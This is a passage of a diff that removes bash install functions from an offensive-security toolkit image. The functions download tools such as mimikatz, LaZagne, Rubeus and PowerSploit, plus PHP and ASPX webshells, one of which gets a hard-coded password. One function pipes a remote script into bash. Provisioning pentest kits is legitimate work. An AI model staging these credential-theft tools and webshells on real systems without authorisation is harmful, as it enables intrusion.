/opt/resources/windows/sysinternals /opt/resources/windows/sysinternals.zip - rm /opt/resources/windows/sysinternals.zip -} - -function winenum() { - colorecho "Downloading WinEnum" - git -C /opt/resources/windows/ clone https://github.com/mattiareggiani/WinEnum -} - -function pspy() { - colorecho "Downloading pspy" - mkdir -p /opt/resources/linux/pspy - wget -O /opt/resources/linux/pspy/pspy32 "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy32" - wget -O /opt/resources/linux/pspy/pspy64 "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy64" - wget -O /opt/resources/linux/pspy/pspy32s "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy32s" - wget -O /opt/resources/linux/pspy/pspy64s "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy64s" -} - -function peass() { - colorecho "Downloading PEAS Suite" - git -C /opt/resources/ clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite - cp -v /opt/resources/windows/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe /opt/resources/windows/winPEAS/winPEAS_x64.exe - cp -v /opt/resources/windows/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe /opt/resources/windows/winPEAS/winPEAS_x86.exe - mv /opt/resources/privilege-escalation-awesome-scripts-suite/linPEAS /opt/resources/linux - mv /opt/resources/privilege-escalation-awesome-scripts-suite/winPEAS /opt/resources/windows - rm -r /opt/resources/privilege-escalation-awesome-scripts-suite -} - -function linux_smart_enumeration() { - colorecho "Downloading Linux Smart Enumeration" - wget -O /opt/resources/linux/lse.sh "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -} - -function linenum() { - colorecho "Downloading LinEnum" - wget -O /opt/resources/linux/LinEnum.sh "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -} - -function linux_exploit_suggester() { - colorecho "Downloading Linux Exploit Suggester" - wget -O /opt/resources/linux/les.sh "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -} - -function mimikatz() { - colorecho "Downloading mimikatz" - wget -O /opt/resources/windows/mimikatz.zip "$(curl -s https://github.com/gentilkiwi/mimikatz/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/mimikatz_trunk.zip" - unzip -d /opt/resources/windows/mimikatz /opt/resources/windows/mimikatz.zip -} - -function mailsniper() { - colorecho "Downloading MailSniper" - git -C /opt/resources/windows/ clone https://github.com/dafthack/MailSniper -} - -function nishang() { - colorecho "Downloading Nishang" - git -C /opt/resources/windows/ clone https://github.com/samratashok/nishang.git -} - -function powersploit() { - colorecho "Downloading PowerSploit" - git -C /opt/resources/windows/ clone https://github.com/PowerShellMafia/PowerSploit -} - -function privesccheck() { - colorecho "Downloading PrivescCheck" - git -C /opt/resources/windows/ clone https://github.com/itm4n/PrivescCheck -} - -function sharpcollection() { - colorecho "Downloading SharpCollection" - git -C /opt/resources/windows/ clone https://github.com/Flangvik/SharpCollection -} - -function rubeus() { - colorecho "Downloading Rubeus" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/Rubeus_3.exe" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/Rubeus_4.5.exe" -} - -function inveigh() { - colorecho "Downloading Inveigh" - git -C /opt/resources/windows/ clone https://github.com/Kevin-Robertson/Inveigh -} - -function sharphound() { - colorecho "Downloading SharpHound" - wget -P /opt/resources/windows/ "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.exe" - wget -P /opt/resources/windows/ "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1" -} - -function azurehound() { - colorecho "Downloading AzureHound" - wget -P /opt/resources/windows/ "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/AzureHound.ps1" -} - -function juicypotato() { - colorecho "Downloading JuicyPotato" - wget -P /opt/resources/windows/ "$(curl -s https://github.com/ohpe/juicy-potato/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/JuicyPotato.exe" -} - -function impacket_windows() { - colorecho "Downloading Impacket examples for Windows" - git -C /opt/resources/windows/ clone https://github.com/maaaaz/impacket-examples-windows -} - -function webshells() { - colorecho "Downloading webshells" - git -C /opt/resources/webshells/PHP/ clone https://github.com/mIcHyAmRaNe/wso-webshell - # Setting password to exegol4thewin - sed -i 's/fa769dac7a0a94ee47d8ebe021eaba9e/0fc3bcf177377d328c77b2b51b7f3c9b/g' /opt/resources/webshells/PHP/wso-webshell/wso.php - echo 'exegol4thewin' > /opt/resources/webshells/PHP/wso-webshell/password.txt - git -C /opt/resources/webshells/PHP/ clone https://github.com/flozz/p0wny-shell - wget -O /opt/resources/webshells/ASPX/webshell.aspx "https://raw.githubusercontent.com/xl7dev/WebShell/master/Aspx/ASPX%20Shell.aspx" -} - -function nc() { - colorecho "Downloading nc for Windows" - cp -v /usr/bin/nc.traditional /opt/resources/linux/nc - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/nc.exe" -} - -function http-put-server() { - colorecho "Downloading http-put-server for Python3" - wget -O /opt/resources/linux/http-put-server.py https://gist.githubusercontent.com/mildred/67d22d7289ae8f16cae7/raw/214c213c9415da18a471d1ed04660022cce059ef/server.py -} - -function spoolsample() { - colorecho "Downloading SpoolSample" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/SpoolSample.exe" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/SpoolSample_v4.5_x64..exe" -} - -function diaghub() { - colorecho "Downloading DiagHub" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/diaghub.exe" -} - -function lazagne() { - colorecho "Downloading LaZagne" - git -C /tmp/ clone https://github.com/AlessandroZ/LaZagne - mv /tmp/LaZagne/Linux /opt/resources/linux/LaZagne - mv /tmp/LaZagne/Mac /opt/resources/mac/LaZagne - mv /tmp/LaZagne/Windows /opt/resources/widnows/LaZagne - wget -P /opt/resources/windows/LaZagne/ "$(curl -s https://github.com/AlessandroZ/LaZagne/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/lazagne.exe" - rm -r /tmp/LaZagne - # Add LaZagne Forensic? https://github.com/AlessandroZ/LaZagneForensic -} - -function sublinacl() { - colorecho "Downloading Sublinacl" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/sublinacl.exe" -} - -function powersploit() { - colorecho "Downloading PowerSploit" - git -C /opt/resources/windows/ clone https://github.com/PowerShellMafia/PowerSploit -} - -function mimipenguin() { - colorecho "Downloading mimipenguin" - git -C /opt/resources/linux/ clone https://github.com/huntergregal/mimipenguin -} - -function mimipy() { - colorecho "Downloading mimipy" - git -C /opt/resources/linux/ clone https://github.com/n1nj4sec/mimipy -} - -function plink() { - colorecho "Downloading plink" - wget -O /opt/resources/windows/plink32.exe "https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe" - wget -O /opt/resources/windows/plink64.exe "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -} - -function deepce() { - colorecho "Downloading deepce" - wget -O /opt/resources/linux/deepce "https://github.com/stealthcopter/deepce/raw/master/deepce.sh" -} - -function arsenal() { - echo "Installing Arsenal" - git -C /opt/tools/ clone https://github.com/Orange-Cyberdefense/arsenal - cd /opt/tools/arsenal - python3 -m pip install -r requirements.txt -} - -function bloodhound() { - echo "Installing BloodHound from sources" - git -C /opt/tools/ clone https://github.com/BloodHoundAD/BloodHound/ - mv /opt/tools/BloodHound /opt/tools/BloodHound4 - zsh -c "source ~/.zshrc && cd /opt/tools/BloodHound4 && nvm install 16.13.0 && nvm use 16.13.0 && npm install -g electron-packager && npm install && npm run build:linux" - mkdir -p ~/.config/bloodhound - cp -v /root/sources/bloodhound/config.json ~/.config/bloodhound/config.json - cp -v /root/sources/bloodhound/customqueries.json ~/.config/bloodhound/customqueries.json -} - -function bloodhound_old_v3() { - echo "Installing Bloodhound v3 (just-in-case)" - fapt libxss1 - wget -P /tmp/ "https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.5/BloodHound-linux-x64.zip" - unzip /tmp/BloodHound-linux-x64.zip -d /opt/tools/ - mv /opt/tools/BloodHound-linux-x64 /opt/tools/BloodHound3 - rm /tmp/BloodHound-linux-x64.zip -} - -function bloodhound_old_v2() { - echo "Installing BloodHound v2 (for older databases/collections)" - wget -P /tmp/ https://github.com/BloodHoundAD/BloodHound/releases/download/2.2.1/BloodHound-linux-x64.zip - unzip /tmp/BloodHound-linux-x64.zip -d /opt/tools/ - mv /opt/tools/BloodHound-linux-x64 /opt/tools/BloodHound2 - rm /tmp/BloodHound-linux-x64.zip -} - -function bettercap_install() { - colorecho "Installing Bettercap" - apt-get -y install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev - go install -v github.com/bettercap/bettercap@latest - /root/go/bin/bettercap -eval "caplets.update; ui.update; q" - sed -i 's/set api.rest.username user/set api.rest.username bettercap/g' /usr/local/share/bettercap/caplets/http-ui.cap - sed -i 's/set api.rest.password pass/set api.rest.password exegol4thewin/g' /usr/local/share/bettercap/caplets/http-ui.cap - sed -i 's/set api.rest.username user/set api.rest.username bettercap/g' /usr/local/share/bettercap/caplets/https-ui.cap - sed -i 's/set api.rest.password pass/set api.rest.password exegol4thewin/g' /usr/local/share/bettercap/caplets/https-ui.cap -} - -function hcxtools() { - colorecho "Installing hcxtools" - git -C /opt/tools/ clone https://github.com/ZerBea/hcxtools - cd /opt/tools/hcxtools/ - make - make install -} - -function hcxdumptool() { - colorecho "Installing hcxdumptool" - apt-get -y install libcurl4-openssl-dev libssl-dev - git -C /opt/tools/ clone https://github.com/ZerBea/hcxdumptool - cd /opt/tools/hcxdumptool - make - make install - ln -s /usr/local/bin/hcxpcapngtool /usr/local/bin/hcxpcaptool -} - -function pyrit() { - colorecho "Installing pyrit" - git -C /opt/tools clone https://github.com/JPaulMora/Pyrit - cd /opt/tools/Pyrit - python -m pip install psycopg2-binary scapy - #https://github.com/JPaulMora/Pyrit/issues/591 - cp -v /root/sources/patches/undefined-symbol-aesni-key.patch undefined-symbol-aesni-key.patch - git apply --verbose undefined-symbol-aesni-key.patch - python setup.py clean - python setup.py build - python setup.py install -} - -function wifite2() { - colorecho "Installing wifite2" - git -C /opt/tools/ clone https://github.com/derv82/wifite2.git - cd /opt/tools/wifite2/ - python3 setup.py install -} - -function wireshark_sources() { - colorecho "Installing tshark, wireshark" - apt-get -y install cmake libgcrypt20-dev libglib2.0-dev libpcap-dev qtbase5-dev libssh-dev libsystemd-dev qtmultimedia5-dev libqt5svg5-dev qttools5-dev libc-ares-dev flex bison byacc - wget -O /tmp/wireshark.tar.xz https://www.wireshark.org/download/src/wireshark-latest.tar.xz - cd /tmp/ - tar -xvf /tmp/wireshark.tar.xz - cd "$(find . -maxdepth 1 -type d -name 'wireshark*')" - cmake . - make - make install - cd /tmp/ - rm -r "$(find . -maxdepth 1 -type d -name 'wireshark*')" - wireshark.tar.xz -} - -function infoga() { - colorecho "Installing infoga" - git -C /opt/tools/ clone https://github.com/m4ll0k/Infoga.git - find /opt/tools/Infoga/ -type f -print0 | xargs -0 dos2unix - cd /opt/tools/Infoga - python setup.py install -} - -function buster() { - colorecho "Installing buster" - git -C /opt/tools/ clone https://github.com/sham00n/buster.git - cd /opt/tools/buster - python3 setup.py install -} - -function pwnedornot() { - colorecho "Installing pwnedornot" - git -C /opt/tools/ clone https://github.com/thewhiteh4t/pwnedOrNot -} -function ghunt() { - colorecho "Installing ghunt" - apt-get update - apt-get install -y curl unzip gnupg - curl -sS -o - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - - echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list - apt-get update - apt-get install -y google-chrome-stable - rm -rf /var/lib/apt/lists/* - git -C /opt/tools/ clone https://github.com/mxrch/GHunt - cd /opt/tools/GHunt - python3 -m pip install -r requirements.txt - python3 download_chromedriver.py -} - - -function oaburl_py() { - colorecho "Downloading oaburl.py" - mkdir /opt/tools/OABUrl - wget -O /opt/tools/OABUrl/oaburl.py "https://gist.githubusercontent.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438/raw/96ec2f68a905eed4d519d9734e62edba96fd15ff/oaburl.py" - chmod +x /opt/tools/OABUrl/oaburl.py -} - -function libmspack() { - colorecho "Installing libmspack" - git -C /opt/tools/ clone https://github.com/kyz/libmspack.git - cd /opt/tools/libmspack/libmspack - ./rebuild.sh - ./configure - make -} - -function peas_offensive() { - colorecho "Installing PEAS-Offensive" - git -C /opt/tools/ clone https://github.com/snovvcrash/peas.git peas-offensive - python3 -m pip install pipenv - cd /opt/tools/peas-offensive - pipenv --python 2.7 install -r requirements.txt -} - -function ruler() { - colorecho "Downloading ruler and form templates" - mkdir -p /opt/tools/ruler/templates - wget -O /opt/tools/ruler/ruler "$(curl -s https://github.com/sensepost/ruler/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/ruler-linux64" - chmod +x /opt/tools/ruler/ruler - wget -O /opt/tools/ruler/templates/formdeletetemplate.bin "https://github.com/sensepost/ruler/raw/master/templates/formdeletetemplate.bin" - wget -O /opt/tools/ruler/templates/formtemplate.bin "https://github.com/sensepost/ruler/raw/master/templates/formtemplate.bin" - wget -O /opt/tools/ruler/templates/img0.bin "https://github.com/sensepost/ruler/raw/master/templates/img0.bin" - wget -O /opt/tools/ruler/templates/img1.bin "https://github.com/sensepost/ruler/raw/master/templates/img1.bin" -} - -function ghidra() { - colorecho "Installing Ghidra" - apt-get -y install openjdk-14-jdk - wget -P /tmp/ "https://ghidra-sre.org/ghidra_9.2.3_PUBLIC_20210325.zip" - unzip /tmp/ghidra_9.2.3_PUBLIC_20210325.zip -d /opt/tools - rm /tmp/ghidra_9.2.3_PUBLIC_20210325.zip -} - -function burp() { - colorecho "Installing Burp" - burp_version=$(curl -s "https://portswigger.net/burp/releases#community" | grep -P -o "\d{4}-\d-\d" | head -1 | tr - .) - wget "https://portswigger.net/burp/releases/download?product=community&version=$burp_version&type=Linux" -O /tmp/burp.sh - chmod +x "/tmp/burp.sh" - /tmp/burp.sh -q - # FIXME: find a way to install in /opt/tools? - # FIXME: set up the dark theme right away? - # FIXME: add burp certificate to embedded firefox and chrome? -} - -function bitleaker() { - colorecho "Downloading bitleaker for BitLocker TPM attacks" - git -C "/opt/resources/encrypted disks/" clone https://github.com/kkamagui/bitleaker -} - -function napper() { - colorecho "Download napper for TPM vuln scanning" - git -C "/opt/resources/encrypted disks/" clone https://github.com/kkamagui/napper-for-tpm -} - -function linkedin2username() { - colorecho "Installing linkedin2username" - git -C /opt/tools/ clone https://github.com/initstring/linkedin2username - cd /opt/tools/linkedin2username - python3 -m python -m pip install -r requirements.txt -} - -function toutatis() { - colorecho "Installing toutatis" - git -C /opt/tools/ clone https://github.com/megadose/toutatis - cd /opt/tools/toutatis - python3 setup.py install -} - -function carbon14() { - colorecho "Installing Carbon14" - git -C /opt/tools/ clone https://github.com/Lazza/Carbon14 - cd /opt/tools/Carbon14 - python3 -m pip install -r requirements.txt -} - -function youtubedl() { - colorecho "Installing youtube-dl" - python3 -m pip install youtube-dl -} - -function ipinfo() { - colorecho "Installing ipinfo" - sudo npm install ipinfo-cli --global -} - -function constellation() { - colorecho "Installing constellation" - cd /opt/tools/ - wget https://github.com/constellation-app/constellation/releases/download/v2.1.1/constellation-linux-v2.1.1.tar.gz - tar xvf constellation-linux-v2.1.1.tar.gz - rm constellation-linux-v2.1.1.tar.gz -} - - -function holehe() { - colorecho "Installing holehe" - python3 -m pip install holehe -} - -function twint() { - colorecho "Installing twint" - python3 -m pip install twint -} - -function tiktokscraper() { - colorecho "Installing tiktok-scraper" - npm i -g tiktok-scraper -} - -function h8mail() { - colorecho "Installing h8mail" - python3 -m pip install h8mail -} - - -function phoneinfoga() { - colorecho "Installing phoneinfoga" - curl -sSL https://raw.githubusercontent.com/sundowndev/PhoneInfoga/master/support/scripts/install | bash - sudo mv ./phoneinfoga /opt/tools/bin -} - -function windapsearch-go() { - colorecho "Installing Go windapsearch" - wget -O /opt/tools/bin/windapsearch "$(curl -s https://github.com/ropnop/go-windapsearch/releases/latest/ | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/windapsearch-linux-amd64" - chmod +x /opt/tools/bin/windapsearch -} - -function icmpdoor() { - colorecho "Installing icmptools" - git -C /opt/tools/ clone https://github.com/krabelize/icmpdoor - mkdir -p /opt/resources/windows/icmptools/ - cp -v /opt/tools/icmpdoor/binaries/x86_64-linux/* /opt/resources/windows/icmptools/ - mkdir -p /opt/resources/linux/icmptools/ - cp -v /opt/tools/icmpdoor/binaries/x86_64-linux/* /opt/resources/linux/icmptools/ -} - -function install_trilium() { - colorecho "Installing Trilium (building from sources)" - apt-get -y install libpng16-16 libpng-dev pkg-config autoconf libtool build-essential nasm libx11-dev libxkbfile-dev - git -C /opt/tools/ clone -b stable https://github.com/zadam/trilium.git - cd /opt/tools/trilium - # the npm install needs to be executed in the zsh context where nvm is used to set the Node version to be used. - zsh -c "source ~/.zshrc && cd /opt/tools/trilium && nvm use node && npm install && npm rebuild" - mkdir -p /root/.local/share/trilium-data - cp -v /root/sources/trilium/* /root/.local/share/trilium-data -} - -function ntlmv1-multi() { - colorecho "Installing ntlmv1 multi tool" - git -C /opt/tools clone https://github.com/evilmog/ntlmv1-multi -} - -function install_droopescan() { - colorecho "Installing droopescan" - git -C /opt/tools clone https://github.com/droope/droopescan.git - cd /opt/tools/droopescan - python3 -m pip install -r requirements.txt - python3 setup.py install -} - -function install_drupwn() { - colorecho "Installing drupwn" - git -C /opt/tools clone https://github.com/immunIT/drupwn.git - cd /opt/tools/drupwn - python3 setup.py install -} - -function kubectl(){ - colorecho "Installing kubectl" - mkdir -p /opt/tools/kubectl - cd /opt/tools/kubectl - curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" - install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl -} - -function awscli(){ - colorecho "Installing aws cli" - cd /tmp - curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" - unzip awscliv2.zip - ./aws/install -i /opt/tools/aws-cli -b /usr/local/bin - rm -rf aws - rm awscliv2.zip -} - -function install_scout() { - colorecho "Installing ScoutSuite" - python3 -m pip install scoutsuite -} - -function jdwp_shellifier(){ - colorecho "Installing jdwp_shellifier" - git -C /opt/tools/ clone https://github.com/IOActive/jdwp-shellifier.git -} - -function maigret_pip() { - colorecho "Installing maigret" - pip3 install maigret -} - -function amber() { - colorecho "Installing amber" - # TODO: this fails and needs a fix - go install -v github.com/EgeBalci/amber@latest -} - -function hashonymize() { - colorecho "Installing hashonymizer" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/hashonymize - cd /opt/tools/hashonymize - python3 setup.py install -} - -function install_theHarvester() { - colorecho "Installing theHarvester" - python3 -m pip install censys - apt-get -y install theharvester -} - -function install_pcsc() { - colorecho "Installing tools for PC/SC (smartcard)" - apt-get install -y pcsc-tools pcscd libpcsclite-dev libpcsclite1 -} - -function install_libnfc() { - colorecho "Installing libnfc" - apt-get install -y libnfc-dev libnfc-bin - cd /opt/tools/ - wget http://dl.bintray.com/nfc-tools/sources/libnfc-1.7.1.tar.bz2 - tar xjf libnfc-1.7.1.tar.bz2 - cd libnfc-1.7.1 - ./configure --with-drivers=all - make - make install - ldconfig - cd ../ - rm libnfc-1.7.1.tar.bz2 -} - -function install_mfoc() { - colorecho "Installing mfoc" - git -C /opt/tools/ clone https://github.com/nfc-tools/mfoc - cd /opt/tools/mfoc - autoreconf -vis - ./configure - make - make install -} - -function install_mfcuk() { - colorecho "Installing mfcuk" - apt-get install -y mfcuk -} - -function install_libnfc-crypto1-crack() { - colorecho "Installing libnfc_crypto1_crack" - git -C /opt/tools/ clone https://github.com/aczid/crypto1_bs - cd /opt/tools/crypto1_bs - wget https://github.com/droidnewbie2/acr122uNFC/raw/master/crapto1-v3.3.tar.xz - wget https://github.com/droidnewbie2/acr122uNFC/raw/master/craptev1-v1.1.tar.xz - xz -d craptev1-v1.1.tar.xz crapto1-v3.3.tar.xz - tar xvf craptev1-v1.1.tar - tar xvf crapto1-v3.3.tar --one-top-level - make CFLAGS=-"-std=gnu99 -O3 -march=native -Wl,--allow-multiple-definition" - cp libnfc_crypto1_crack /opt/tools/bin -} - -function install_mfdread() { - colorecho "Installing mfdread" - pip3 install bitstring - git -C /opt/tools/ clone https://github.com/zhovner/mfdread -} - -function install_mousejack() { - colorecho "Installing mousejack" - apt-get -y install sdcc binutils python git - python-pip - git -C /opt/tools/ clone https://github.com/BastilleResearch/mousejack - cd /opt/tools/mousejack - git submodule init - git submodule update - cd nrf-research-firmware - make -} - -function install_jackit() { - colorecho "Installing jackit" - git -C /opt/tools/ clone https://github.com/insecurityofthings/jackit - cd /opt/tools/jackit - pip install -e . -} - -function install_gosecretsdump() { - colorecho "Installing gosecretsdump" - git -C /opt/tools/ clone https://github.com/c-sto/gosecretsdump - go install -v github.com/C-Sto/gosecretsdump@latest -} - -function install_hackrf() { - colorecho "Installing HackRF tools" - apt-get -y install hackrf -} - -function install_gqrx() { - colorecho "Installing gqrx" - apt-get -y install gqrx-sdr -} - -function install_sipvicious() { - colorecho "Installing SIPVicious" - git -C /opt/tools/ clone https://github.com/enablesecurity/sipvicious.git - cd /opt/tools/sipvicious/ - python3 setup.py install -} - -function install_httpmethods() { - colorecho "Installing httpmethods" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/httpmethods - cd /opt/tools/httpmethods - python3 setup.py install -} - -function install_adidnsdump() { - colorecho "Installing adidnsdump" - git -C /opt/tools/ clone https://github.com/dirkjanm/adidnsdump - cd /opt/tools/adidnsdump/ - python3 -m pip install . -} - -function install_powermad() { - colorecho "Downloading Powermad for resources" - git -C /opt/resources/windows/ clone https://github.com/Kevin-Robertson/Powermad -} - -function install_snaffler() { - colorecho "Downloading Snaffler for resources" - url=$(curl -s https://github.com/SnaffCon/Snaffler/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/') - mkdir -p /opt/resources/windows/Snaffler - wget -O /opt/resources/windows/Snaffler.zip $url/Snaffler.zip - unzip -d /opt/resources/windows/Snaffler /opt/resources/windows/Snaffler.zip - rm -v /opt/resources/windows/Snaffler.zip -} - -function install_dnschef() { - colorecho "Installing DNSChef" - git -C /opt/tools/ clone https://github.com/iphelix/dnschef -} - -function install_h2csmuggler() { - colorecho "Installing h2csmuggler" - git -C /opt/tools/ clone https://github.com/BishopFox/h2csmuggler - python3 -m pip install h2 -} - -function install_byp4xx() { - colorecho "Installing byp4xx" - git -C /opt/tools/ clone https://github.com/lobuhi/byp4xx -} - -function install_pipx() { - colorecho "Installing pipx" - python3 -m pip install pipx - pipx ensurepath -} - -function install_peepdf() { - colorecho "Installing peepdf" - fapt libjpeg-dev - python3 -m pip install peepdf -} - -function install_volatility() { - colorecho "Installing volatility" - apt-get -y install pcregrep libpcre++-dev python2-dev yara - git -C /opt/tools/ clone https://github.com/volatilityfoundation/volatility - cd /opt/tools/volatility - python -m pip install pycrypto distorm3 pillow openpyxl ujson - python setup.py install - # https://github.com/volatilityfoundation/volatility/issues/535#issuecomment-407571161 - ln -s /usr/local/lib/python2.7/dist-packages/usr/lib/libyara.so /usr/lib/libyara.so -} - -function install_zsteg() { - colorecho "Installing zsteg" - gem install zsteg -} - -function install_stegolsb() { - colorecho "Installing stegolsb" - python3 -m pip install stego-lsb -} - -function install_whatportis() { - colorecho "Installing whatportis" - python3 -m pip install whatportis - echo y | whatportis --update -} - -function install_ultimate_vimrc() { - colorecho "Installing The Ultimate vimrc" - git clone --depth=1 https://github.com/amix/vimrc.git ~/.vim_runtime - sh ~/.vim_runtime/install_awesome_vimrc.sh -} - -function install_ngrok() { - colorecho "Installing ngrok" - wget -O /tmp/ngrok.zip https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip - unzip -d /opt/tools/bin/ /tmp/ngrok.zip -} - -function install_chisel() { - colorecho "Installing chisel" - go get -v github.com/jpillora/chisel - #FIXME: add windows pre-compiled binaries in /opt/ressources/windows? -} - -function install_sshuttle() { - colorecho "Installing sshtuttle" - git -C /opt/tools/ clone https://github.com/sshuttle/sshuttle.git - cd /opt/tools/sshuttle - python3 setup.py install -} - -function install_pygpoabuse() { - colorecho "Installing pyGPOabuse" - git -C /opt/tools/ clone https://github.com/Hackndo/pyGPOAbuse -} - -function install_rsactftool() { - colorecho "Installing RsaCtfTool" - git -C /opt/tools/ clone https://github.com/Ganapati/RsaCtfTool - cd /opt/tools/RsaCtfTool - apt-get -y install libgmp3-dev libmpc-dev - python3 -m pip install -r requirements.txt -} - -function install_feroxbuster() { - colorecho "Installing feroxbuster" - # cd /tmp - # curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/feroxbuster_amd64.deb.zip - # unzip feroxbuster_amd64.deb.zip - # rm feroxbuster_amd64.deb.zip - # apt-get -y install -f ./feroxbuster_*_.deb - # rm feroxbuster*.deb - apt-get -y install feroxbuster -} - -function install_bloodhound-import() { - colorecho "Installing bloodhound-import" - python3 -m pip install bloodhound-import -} - -function install_bloodhound-quickwin() { - colorecho "Installing bloodhound-quickwin" - python3 -m pip install py2neo pandas prettytable - git -C /opt/tools/ clone https://github.com/kaluche/bloodhound-quickwin -} - -function install_ldapsearch-ad() { - colorecho "Installing ldapsearch-ad" - python3 -m pip install -r requirements.txt - git -C /opt/tools/ clone https://github.com/yaap7/ldapsearch-ad -} - -function install_ntlm-scanner() { - colorecho "Installing ntlm-scanner" - git -C /opt/tools/ clone https://github.com/preempt/ntlm-scanner -} - -function install_rustscan() { - colorecho "Installing RustScan" - mkdir /opt/tools/rustscan/ - wget -qO- https://api.github.com/repos/RustScan/RustScan/releases/latest | grep "browser_download_url.*amd64.deb" | cut -d: -f2,3 | tr -d \" | wget -qO /opt/tools/rustscan/rustscan.deb -i- - dpkg -i /opt/tools/rustscan/rustscan.deb - wget https://gist.github.com/snovvcrash/c7f8223cc27154555496a9cbb4650681/raw/a76a2c658370d8b823a8a38a860e4d88051b417e/rustscan-ports-top1000.toml -O /root/.rustscan.toml -} - -function install_divideandscan() { - colorecho "Installing DivideAndScan" - git -C /opt/tools/ clone https://github.com/snovvcrash/DivideAndScan - cd /opt/tools/DivideAndScan - python3 -m pip install . -} - -function install_trid() { - colorecho "Installing trid" - mkdir /opt/tools/trid/ - cd /opt/tools/trid - wget https://mark0.net/download/tridupdate.zip - wget https://mark0.net/download/triddefs.zip - wget https://mark0.net/download/trid_linux_64.zip - unzip trid_linux_64.zip - unzip triddefs.zip - unzip tridupdate.zip - rm tridupdate.zip triddefs.zip trid_linux_64.zip - chmod +x trid - python3 tridupdate.py -} - -function install_pcredz() { - colorecho "Installing PCredz" - fapt python3-pip libpcap-dev - python3 -m pip install Cython python-libpcap - git -C /opt/tools/ clone https://github.com/lgandx/PCredz -} - -function install_smartbrute() { - colorecho "Installing smartbrute" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/smartbrute - cd /opt/tools/smartbrute - python3 -m pipx install . -} - -function install_frida() { - colorecho "Installing frida" - python3 -m pip install frida-tools -} - -function install_androguard() { - colorecho "Installing androguard" - python3 -m pip install androguard -} - -function install_petitpotam() { - colorecho "Installing PetitPotam" - git -C /opt/tools/ clone https://github.com/ly4k/PetitPotam - mv /opt/tools/PetitPotam /opt/tools/PetitPotam_alt - git -C /opt/tools/ clone https://github.com/topotam/PetitPotam -} - -function install_PKINITtools() { - colorecho "Installing PKINITtools" - git -C /opt/tools/ clone https://github.com/dirkjanm/PKINITtools -} - -function install_pywhisker() { - colorecho "Installing pyWhisker" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/pywhisker - cd /opt/tools/pywhisker - python3 -m pip install -r requirements.txt -} - -function install_targetedKerberoast() { - colorecho "Installing targetedKerberoast" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/targetedKerberoast - cd /opt/tools/targetedKerberoast - python3 -m pip install -r requirements.txt -} - -function install_manspider() { - colorecho "Installing MANSPIDER" - git -C /opt/tools/ clone https://github.com/blacklanternsecurity/MANSPIDER - fapt antiword - fapt tesseract-ocr - python3 -m pip install man-spider -} - -function install_pywsus() { - colorecho "Installing pywsus" - git -C /opt/tools/ clone https://github.com/GoSecure/pywsus - cd /opt/tools/pywsus - python3 -m pip install -r requirements.txt -} - -function install_ignorant() { - colorecho "Installing ignorant" - git -C /opt/tools/ clone https://github.com/megadose/ignorant - cd /opt/tools/ignorant - python3 -m pipx install . -} - -function install_donpapi() { - colorecho "Installing DonPAPI" - git -C /opt/tools/ clone https://github.com/login-securite/DonPAPI.git - python3 -m pip install -r requirements.txt -} - -function install_gau() { - colorecho "Installing gau" - GO111MODULE=on go install -v github.com/lc/gau@latest -} - -function install_webclientservicescanner() { - colorecho "Installing webclientservicescanner" - git -C /opt/tools/ clone https://github.com/Hackndo/WebclientServiceScanner - cd /opt/tools/WebclientServiceScanner - python3 -m pipx install . -} - -function install_certipy() { - colorecho "Installing Certipy" - git -C /opt/tools/ clone https://github.com/ly4k/Certipy - 